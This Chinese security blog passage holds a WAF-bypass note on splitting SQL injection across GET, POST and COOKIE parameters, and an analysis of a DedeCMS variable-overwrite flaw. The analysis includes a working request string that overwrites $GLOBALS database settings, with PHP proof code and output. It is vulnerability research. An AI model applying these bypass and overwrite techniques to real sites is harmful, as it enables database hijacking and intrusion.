———————————————–

发送一个POST包，GET,POST,COOKIE三个方法中都带有不同的t参数内容
———————————————–
POST http://192.168.239.129/1.aspx?t=1 HTTP/1.1
Host: 192.168.239.129
Cookie: t=2

t=3
———————————————–

结果返回
Request:1,3,2

最后得出结论，Request.Params方法接收的数据是按照GPC顺序整合，看到这里的同学再联想到0×02的复参攻击应该如醍醐灌顶了，我们可以将SQL攻击语句拆分到GET,POST,COOKIE三个变量里进行组合攻击。想一想WAF针对这种高级复参攻击是否防御好了？

0×04 后话

WAF是不可能解决所有安全问题的，本文的思路归其本源实际上是描叙了WAF处理HTTP包与服务端处理HTTP包数种差异。互联网是不断更新迭代的，差异存在，类似的漏洞也会存在。
本文提到了三种绕过WAF的思路，第一种是我的原创属于0DAY状态，第二种是参考已有的复参攻击，其中第三种高级复参攻击是由Safe3同学提出的，本文也是与Safe3同学讨论他开发的WAF的BUG而来，所以感谢Safe3同学。
另外请大家不要将本文的内容用于非法途径，仅供安全人员参考，谢谢。

参考：
[1].http://www.faqs.org/rfcs/rfc2616.html
[2].http://www.w3school.com.cn/asp/asp_ref_request.asp
[3].http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf
[4].http://msdn.microsoft.com/en-us/library/system.web.httprequest.aspx

在网上也考到mr_xhming同学的分析:

http://hi.baidu.com/mr_xhming/blog/item/5e6d6009d44b1f39e92488a5.html

底下还有大牛的评论

2009-06-14 00:01 | 回复

当时我也纳闷，DedeCms变量覆盖漏洞为什么能覆盖数据库配置变量？因为覆盖(或者说创建)在前，赋值在后啊。

//include/common.inc.php

function _RunMagicQuotes(&$svar)
{
if(!get_magic_quotes_gpc())
{
if( is_array($svar) )
{
foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
}
else
{
$svar = addslashes($svar);
}
}
return $svar;
}

if (!defined('DEDEREQUEST'))
{
//检查和注册外部提交的变量
foreach($_REQUEST as $_k=>$_v)
{
if( strlen($_k)>0 && preg_match('/^(cfg_|GLOBALS)/',$_k) )
{
exit('Request var not allow!');
}
}
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);  //这里覆盖变量
}
}

//系统相关变量检测
if(!isset($needFilter))
{
$needFilter = false;
}
$registerGlobals = @ini_get(“register_globals”);
$isUrlOpen = @ini_get(“allow_url_fopen”);
$isSafeMode = @ini_get(“safe_mode”);
if( preg_match(‘/windows/i’, @getenv(‘OS’)) )
{
$isSafeMode = false;
}

//Session保存路径
$sessSavePath = DEDEDATA.”/sessions/”;
if(is_writeable($sessSavePath) && is_readable($sessSavePath))
{
session_save_path($sessSavePath);
}

//系统配置参数
require_once(DEDEDATA.”/config.cache.inc.php”);

//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数
if($_FILES)
{
require_once(DEDEINC.’/uploadsafe.inc.php’);
}

//数据库配置文件
require_once(DEDEDATA.’/common.inc.php’);        //这里引入数据库配置文件
…

//data/common.inc.php 里面的内容

<?php
//数据库连接信息
$cfg_dbhost = ‘localhost’;
$cfg_dbname = ‘de2′;
$cfg_dbuser = ‘root’;
$cfg_dbpwd = ”;
$cfg_dbprefix = ‘dede_’;
$cfg_db_language = ‘utf8′;

?>

看起来的样子是就算覆盖了$cfg_dbname这些变量但是后面的文章又给$cfg_dbname赋了值。

然后我以为只有那些系统变量在覆盖前没初始化的才可以覆盖利用，但是我利用这个漏洞是通过别的途径，运气好点也能搞到shell。当时根本没看懂fly大牛的评论(这个漏洞人家09年的时候就已经公布出来了？但是08年是利用$_FILES数组覆盖的。）当时网上爆的Dedecms的变量覆盖是$_FILES数组,其实除了这个还有更严重的，很多人都发现了但是没人爆出了，因为爆出来就没得玩了。但是Dedecms那帮家伙只知道修修补补，补了那个变量覆盖的时候就在旁边的更明显的都没发现。现在他们补了这个漏洞，还是有些别的严重的问题他们还是没补完。

扯的有点多，关键的问题还没解决。变量覆盖是存在的，但是怎么利用还不知道。

问题的根本就是: $cfg_dbname和$GLOBALS['cfg_dbname']到底是不是一回事？
我原来想当然的以为是一回事，其实根本不是那么回事。

我们可以做个实验：

把include/common.inc.php添加几行代码看一下：

echo '---------------------------------------------------------</br>';
echo '$GLOBALS[cfg_dbname]:';
var_dump($GLOBALS[cfg_dbname]);
echo '---------------------------------------------------------</br>';
echo '$cfg_dbname';
var_dump($cfg_dbname);
//数据库配置文件
echo '++++++++++++++++++++++++++++++++++++++++++++++++++++++++</br>';
require_once(DEDEDATA.'/common.inc.php');
echo '---------------------------------------------------------</br>';
echo '$GLOBALS[cfg_dbname]:';
var_dump($GLOBALS[cfg_dbname]);
echo '---------------------------------------------------------</br>';
echo '$cfg_dbname';
var_dump($cfg_dbname);
exit;

提交 http://127.0.0.1/de2/index.php?_POST[cfg_dbname]=1234

结果如下：

---------------------------------------------------------
$GLOBALS[cfg_dbname]:
string '1234' (length=4)
---------------------------------------------------------

$cfg_dbname
string '1234' (length=4)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++

---------------------------------------------------------
$GLOBALS[cfg_dbname]:
string 'de2' (length=3)
---------------------------------------------------------

$cfg_dbname
string 'de2' (length=3)

提交:http://127.0.0.1/de2/index.php?_POST[GLOBALS][cfg_dbname]=1234

---------------------------------------------------------
$GLOBALS[cfg_dbname]:

string '1234' (length=4)
---------------------------------------------------------

$cfg_dbname
null
++++++++++++++++++++++++++++++++++++++++++++++++++++++++

---------------------------------------------------------
$GLOBALS[cfg_dbname]:
string '1234' (length=4)
---------------------------------------------------------

$cfg_dbname
string 'de2' (length=3)

现在发现得到了我们想要的结果了，因为其后引入的数据库类

if ($GLOBALS['cfg_mysql_type'] == 'mysqli' && function_exists("mysqli_init"))

{
 require_once(DEDEINC.'/dedesqli.class.php');

} else {

 require_once(DEDEINC.'/dedesql.class.php');

}

里面的初始化函数是这样的，用的$GLOBALS['cfg_dbname']变量完成的赋值。

function Init($pconnect=FALSE)
{
$this->linkID = 0;
$this->queryString = '';
$this->parameters = Array();
$this->dbHost   =  $GLOBALS['cfg_dbhost'];
$this->dbUser   =  $GLOBALS['cfg_dbuser'];
$this->dbPwd    =  $GLOBALS['cfg_dbpwd'];
$this->dbName   =  $GLOBALS['cfg_dbname'];
$this->dbPrefix =  $GLOBALS['cfg_dbprefix'];
$this->result["me"] = 0;
$this->Open($pconnect);
}

所以是可以覆盖的，因为$GLOBALS数组被覆盖后变成了一个普通数组(不再是PHP的超全局变量),$GLOBALS['cfg_dbname'] 并不再等同于$cfg_dbname .我原来也是认为一直等同的。

而Dedecms的数据库配置文件用的是$GLOBALS['cfg_dbname']变量。

经foreach循环覆盖$GLOBALS之后导致$GLOBALS不再是超全局变量了，他成了普通的数组了，所以$GLOBALS['cfg_dbname'] 不再等同于$cfg_dbname 这是问题的关键.
证明代码如下

< ?php
$_POST['GLOBALS']['cfg_dbname'] = '123';
var_dump($GLOBALS);
foreach($_POST as $k => $v)
{
$$k=$v;
}
echo '~~~~~~~~~~~~~~~~~~~~~~';
echo $cfg_dbname.':'.$GLOBALS['cfg_dbname'];
echo '+++++++++++++++++++++++';
var_dump($GLOBALS);
$cfg_dbname = '456';
echo '-----------------------';
echo $cfg_dbname.':'.$GLOBALS['cfg_dbname'];
?>

结果如下

array
  'GLOBALS' =>
    &array
  'HTTP_HOST' => string '127.1' (length=5)
  'HTTP_USER_AGENT' => string 'Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20' (length=90)
  'HTTP_ACCEPT' => string 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' (length=63)
  'HTTP_ACCEPT_LANGUAGE' => string 'zh-cn,zh;q=0.5' (length=14)
  'HTTP_ACCEPT_ENCODING' => string 'gzip,deflate' (length=12)
  'HTTP_ACCEPT_CHARSET' => string 'GB2312,utf-8;q=0.7,*;q=0.7' (length=26)
  'HTTP_KEEP_ALIVE' => string '115' (length=3)
  'HTTP_CONNECTION' => string 'keep-alive' (length=10)
  'PATH' => string 'C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\ThinkPad\Bluetooth Software\syswow64;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Common Files\Lenovo;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\'... (length=975)
  'SystemRoot' => string 'C:\Windows' (length=10)
  'COMSPEC' => string 'C:\Windows\system32\cmd.exe' (length=27)
  'PATHEXT' => string '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC' (length=53)
  'WINDIR' => string 'C:\Windows' (length=10)
  'SERVER_SIGNATURE' => string '' (length=0)
  'SERVER_SOFTWARE' => string 'Apache/2.2.17 (Win32) PHP/5.3.5' (length=31)
  'SERVER_NAME' => string '127.1' (length=5)
  'SERVER_ADDR' => string '127.0.0.1' (length=9)
  'SERVER_PORT' => string '80' (length=2)
  'REMOTE_HOST' => string 'web9.vghtpe.gov.tw' (length=18)
  'REMOTE_ADDR' => string '127.0.0.1' (length=9)
  'DOCUMENT_ROOT' => string 'C:/wamp/www/' (length=12)
  'SERVER_ADMIN' => string 'admin@localhost' (length=15)
  'SCRIPT_FILENAME' => string 'C:/wamp/www/5.php' (length=17)
  'REMOTE_PORT' => string '53482' (length=5)
  'GATEWAY_INTERFACE' => string 'CGI/1.1' (length=7)
  'SERVER_PROTOCOL' => string 'HTTP/1.1' (length=8)
  'REQUEST_METHOD' => string 'GET' (length=3)
  'QUERY_STRING' => string '' (length=0)
  'REQUEST_URI' => string '/5.php' (length=6)
  'SCRIPT_NAME' => string '/5.php' (length=6)
  'PHP_SELF' => string '/5.php' (length=6)
  'REQUEST_TIME' => int 1314794715
  '_POST' =>
    array
      'GLOBALS' =>
        array
          'cfg_dbname' => string '123' (length=3)
  '_GET' =>
    array
      empty
  '_COOKIE' =>
    array
      empty
  '_SERVER' =>
    array
      'HTTP_HOST' => string '127.1' (length=5)
      'HTTP_USER_AGENT' => string 'Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20' (length=90)
      'HTTP_ACCEPT' => string 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' (length=63)
      'HTTP_ACCEPT_LANGUAGE' => string 'zh-cn,zh;q=0.5' (length=14)
      'HTTP_ACCEPT_ENCODING' => string 'gzip,deflate' (length=12)
      'HTTP_ACCEPT_CHARSET' => string 'GB2312,utf-8;q=0.7,*;q=0.7' (length=26)
      'HTTP_KEEP_ALIVE' => string '115' (length=3)
      'HTTP_CONNECTION' => string 'keep-alive' (length=10)
      'PATH' => string 'C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\ThinkPad\Bluetooth Software\;C:\Program Files\ThinkPad\Bluetooth Software\syswow64;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Common Files\Lenovo;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\'... (length=975)
      'SystemRoot' => string 'C:\Windows' (length=10)
      'COMSPEC' => string 'C:\Windows\system32\cmd.exe' (length=27)
      'PATHEXT' => string '.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC' (length=53)
      'WINDIR' => string 'C:\Windows' (length=10)
      'SERVER_SIGNATURE' => string '' (length=0)
      'SERVER_SOFTWARE' => string 'Apache/2.2.17 (Win32) PHP/5.3.5' (length=31)
      'SERVER_NAME' => string '127.1' (length=5)
      'SERVER_ADDR' => string '127.0.0.1' (length=9)
      'SERVER_PORT' => string '80' (length=2)
      'REMOTE_HOST' => string 'web9.vghtpe.gov.tw' (length=18)
      'REMOTE_ADDR' => string '127.0.0.1' (length=9)
      'DOCUMENT_ROOT' => string 'C:/wamp/www/' (length=12)
      'SERVER_ADMIN' => string 'admin@localhost' (length=15)
      'SCRIPT_FILENAME' => string 'C:/wamp/www/5.php' (length=17)
      'REMOTE_PORT' => string '53482' (length=5)
      'GATEWAY_INTERFACE' => string 'CGI/1.1' (length=7)
      'SERVER_PROTOCOL' => string 'HTTP/1.1' (length=8)
      'REQUEST_METHOD' => string 'GET' (length=3)
      'QUERY_STRING' => string '' (length=0)
      'REQUEST_URI' => string '/5.php' (length=6)
      'SCRIPT_NAME' => string '/5.php' (length=6)
      'PHP_SELF' => string '/5.php' (length=6)
      'REQUEST_TIME' => int 1314794715
  '_ENV' =>
    array
      empty
  '_FILES' =>
    array
      empty
  '_REQUEST' =>
    array
      empty

~~~~~~~~~~~~~~~~~~~~~~
:123
+++++++++++++++++++++++

array
  'cfg_dbname' => string '123' (length=3)

-----------------------
456:123